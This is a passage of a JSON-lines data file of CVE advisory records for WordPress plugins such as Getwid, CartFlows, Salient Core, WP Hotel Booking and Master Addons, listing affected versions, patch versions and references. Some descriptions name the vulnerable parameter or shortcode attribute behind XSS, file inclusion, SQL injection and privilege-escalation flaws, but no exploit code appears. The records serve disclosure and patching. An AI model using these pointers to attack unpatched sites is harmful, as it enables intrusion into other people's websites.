{"CVE_ID":"CVE-2024-11368","slug":"splash-connector","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Splash Sync plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splash-connector\\\/tags\\\/2.0.6\\\/includes\\\/class-splash-wordpress-settings.php#L259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splash-connector\\\/tags\\\/2.0.6\\\/includes\\\/class-splash-wordpress-settings.php#L259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be1cfcf-26f1-47d8-a48c-d9f385eb031a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be1cfcf-26f1-47d8-a48c-d9f385eb031a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4787","slug":"themify-shortcodes","versionEndExcluding":"2.0.8","description":"Themify Shortcodes WordPress plugin before 2.0.8 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ab59972-ccfd-48f6-b879-58fb38823ca5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ab59972-ccfd-48f6-b879-58fb38823ca5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3588","slug":"getwid","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown block in all versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4770184-1b96-490c-b506-f648ab3ed764?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4770184-1b96-490c-b506-f648ab3ed764?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/assets\\\/blocks\\\/counter\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/assets\\\/blocks\\\/counter\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/motopress\\\/getwid\\\/pull\\\/123\\\/files#diff-042442d51783880aea585ad052aae32346491ed600f83b950955084a96a6e030\",\"name\":\"https:\\\/\\\/github.com\\\/motopress\\\/getwid\\\/pull\\\/123\\\/files#diff-042442d51783880aea585ad052aae32346491ed600f83b950955084a96a6e030\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077603%40getwid&new=3077603%40getwid&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077603%40getwid&new=3077603%40getwid&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4632","slug":"cartflows","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The WooCommerce Checkout & Funnel Builder by CartFlows \u2013 Create High Converting Stores For WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018custom_upload_mimes\u2019 function in versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9a89613-cfd9-4a96-b8eb-4b17376be433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9a89613-cfd9-4a96-b8eb-4b17376be433?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cartflows\\\/tags\\\/2.0.7\\\/classes\\\/importer\\\/batch-process\\\/class-cartflows-batch-process.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cartflows\\\/tags\\\/2.0.7\\\/classes\\\/importer\\\/batch-process\\\/class-cartflows-batch-process.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087760\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087760\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13466","slug":"automatically-hierarchic-categories-in-menu","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Automatically Hierarchic Categories in Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'autocategorymenu' shortcode in all versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automatically-hierarchic-categories-in-menu\\\/trunk\\\/includes\\\/class-auto-hierarchic-category-menu.php#L312\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automatically-hierarchic-categories-in-menu\\\/trunk\\\/includes\\\/class-auto-hierarchic-category-menu.php#L312\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3229318%40automatically-hierarchic-categories-in-menu&new=3229318%40automatically-hierarchic-categories-in-menu&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3229318%40automatically-hierarchic-categories-in-menu&new=3229318%40automatically-hierarchic-categories-in-menu&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automatically-hierarchic-categories-in-menu\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automatically-hierarchic-categories-in-menu\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad01d01a-d1d9-4c4e-9818-52298c2df89c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad01d01a-d1d9-4c4e-9818-52298c2df89c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3812","slug":"salient-core","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Salient Core plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.7 via the 'nectar_icon' shortcode 'icon_linea' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd3b70e-a06a-4dcc-a6af-dbe64fd57c82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd3b70e-a06a-4dcc-a6af-dbe64fd57c82?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0151","slug":"utubevideo-gallery","versionEndExcluding":"2.0.8","description":"The uTubeVideo Gallery WordPress plugin before 2.0.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9fc6f5f-efc1-4e23-899b-e9a49330ed13\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9fc6f5f-efc1-4e23-899b-e9a49330ed13\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5652","slug":"wp-hotel-booking","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The WP Hotel Booking WordPress plugin before 2.0.8 does not have authorisation and CSRF checks, as well as does not escape user input before using it in a SQL statement of a function hooked to admin_init, allowing unauthenticated users to perform SQL injections","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ea46b9a-5239-476b-949d-49546371eac1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ea46b9a-5239-476b-949d-49546371eac1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5651","slug":"wp-hotel-booking","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The WP Hotel Booking WordPress plugin before 2.0.8 does not have authorisation and CSRF checks, as well as does not ensure that the package to be deleted is a package, allowing any authenticated users, such as subscriber to delete arbitrary posts","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a365c050-96ae-4266-aa87-850ee259ee2c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a365c050-96ae-4266-aa87-850ee259ee2c\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11200","slug":"goodlayers-core","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Goodlayers Core plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018font-family\u2019 parameter in all versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/goodlayers.com\\\/\",\"name\":\"https:\\\/\\\/goodlayers.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1baa3f0-28ec-409f-a9a5-c35545ab439a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1baa3f0-28ec-409f-a9a5-c35545ab439a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4548","slug":"imageseo","versionEndExcluding":"2.0.8","description":"The Optimize images ALT Text & names for SEO using AI WordPress plugin before 2.0.8 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ff435bc-ea20-4993-98ae-1f61b1732b59\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ff435bc-ea20-4993-98ae-1f61b1732b59\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4027","slug":"radio-player","versionImpact":"2.0.73","versionEndExcluding":"2.0.74","description":"The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_settings function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to update plugin settings.","recommendation":"Update to version 2.0.74, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cc9f75d-f1a6-486b-b924-76ec618c5314?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cc9f75d-f1a6-486b-b924-76ec618c5314?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3050056\\\/radio-player\\\/tags\\\/2.0.74\\\/includes\\\/class-ajax.php?old=2986565&old_path=radio-player%2Ftags%2F2.0.73%2Fincludes%2Fclass-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3050056\\\/radio-player\\\/tags\\\/2.0.74\\\/includes\\\/class-ajax.php?old=2986565&old_path=radio-player%2Ftags%2F2.0.73%2Fincludes%2Fclass-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4025","slug":"radio-player","versionImpact":"2.0.73","versionEndExcluding":"2.0.74","description":"The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_player function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to update player instances.","recommendation":"Update to version 2.0.74, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77409977-6822-4d14-9842-cb6a5aff2162?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77409977-6822-4d14-9842-cb6a5aff2162?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048105\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4024","slug":"radio-player","versionImpact":"2.0.73","versionEndExcluding":"2.0.74","description":"The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_player function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to delete player instances.","recommendation":"Update to version 2.0.74, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f408f1f-207e-427a-a5d0-d0fadf453d7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f408f1f-207e-427a-a5d0-d0fadf453d7e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048105\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9618","slug":"master-addons","versionImpact":"2.0.7.2","versionEndExcluding":"2.0.7.3","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 2.0.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/master-addons.com\\\/changelogs\\\/\",\"name\":\"https:\\\/\\\/master-addons.com\\\/changelogs\\\/\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L1030\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L1030\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L1993\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L1993\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L510\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L510\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L535\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L535\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243199\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243199\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249130\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249130\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8d399f3-5517-4c5d-b792-94eb8b0cc0f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8d399f3-5517-4c5d-b792-94eb8b0cc0f4?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-0433","slug":"master-addons","versionImpact":"2.0.7.1","versionEndExcluding":"2.0.7.2","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 2.0.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-hover-effects\\\/ma-image-hover-effects.php#L1117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-hover-effects\\\/ma-image-hover-effects.php#L1117\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tabs\\\/ma-tabs.php#L568\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tabs\\\/ma-tabs.php#L568\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243199\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243199\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c693831f-fe60-4548-83aa-4ebd03d134ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c693831f-fe60-4548-83aa-4ebd03d134ec?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2023-47526","slug":"chart-builder","versionEndExcluding":"2.0.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chart Builder Team Chartify \u2013 WordPress Chart Plugin allows Stored XSS. This issue affects Chartify \u2013 WordPress Chart Plugin: from n\/a through 2.0.6.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chart-builder\\\/wordpress-chartify-plugin-2-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chart-builder\\\/wordpress-chartify-plugin-2-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0328","slug":"insert-headers-and-footers","versionEndExcluding":"2.0.7","description":"The WPCode WordPress plugin before 2.0.7 does not have adequate privilege checks in place for several AJAX actions, only checking the nonce. This may lead to allowing any authenticated user who can edit posts to call the endpoints related to WPCode Library authentication (such as update and delete the auth key).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c4318a9-a3c5-409b-a52e-edd8583c3c43\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c4318a9-a3c5-409b-a52e-edd8583c3c43\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25149","slug":"gallery-images-ape","versionEndExcluding":"2.0.7","description":"The Gallery Images Ape plugin for WordPress is vulnerable to Arbitrary Plugin Deactivation in versions up to, and including, 2.0.6. This allows authenticated attackers with any capability level to deactivate any plugin on the site, including plugins necessary to site functionality or security.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ape-gallery-plugin-fixed-authenticated-arbitrary-plugin-deactivation-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ape-gallery-plugin-fixed-authenticated-arbitrary-plugin-deactivation-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd6c2b8-b00c-49d1-930f-50397e742ac5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd6c2b8-b00c-49d1-930f-50397e742ac5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4332","slug":"the-plus-addons-for-elementor-page-builder","versionEndExcluding":"2.0.7","description":"The Plus Addons for Elementor plugin for WordPress is vulnerable to arbitrary file reads in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin has a feature to add an \"Info Box\" to an Elementor created page. This Info Box can include an SVG image for the box. Unfortunately, the plugin used file_get_contents with no verification that the file being supplied was an SVG file, so any user with access to the Elementor page builder, such as contributors, could read arbitrary files on the WordPress installation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2523506%40the-plus-addons-for-elementor-page-builder&new=2523506%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2523506%40the-plus-addons-for-elementor-page-builder&new=2523506%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa698e7e-b1c7-4ead-aa2e-7fbfc9dfac80\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa698e7e-b1c7-4ead-aa2e-7fbfc9dfac80\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4331","slug":"the-plus-addons-for-elementor-page-builder","versionEndExcluding":"2.0.7","description":"The Plus Addons for Elementor plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin adds a registration form to the Elementor page builder's functionality. As part of the registration form, users can choose which role to set as the default for users upon registration. This field is not hidden for lower-level users so any user with access to the Elementor page builder, such as contributors, can set the default role to administrator. Since contributors cannot publish posts, only author+ users can elevate privileges without interaction via a site administrator (to approve a post).","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96388c82-2392-42b3-b0a0-c3d92910fb5c\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96388c82-2392-42b3-b0a0-c3d92910fb5c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2514618%40the-plus-addons-for-elementor-page-builder&new=2514618%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2514618%40the-plus-addons-for-elementor-page-builder&new=2514618%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1108","slug":"plugin-groups","versionImpact":"2.0.6","versionEndExcluding":"2.0.7","description":"The Plugin Groups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_init() function in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to change the settings of the plugin, which can also cause a denial of service due to a misconfiguration.","recommendation":"Update to version 2.0.7, or a newer patched 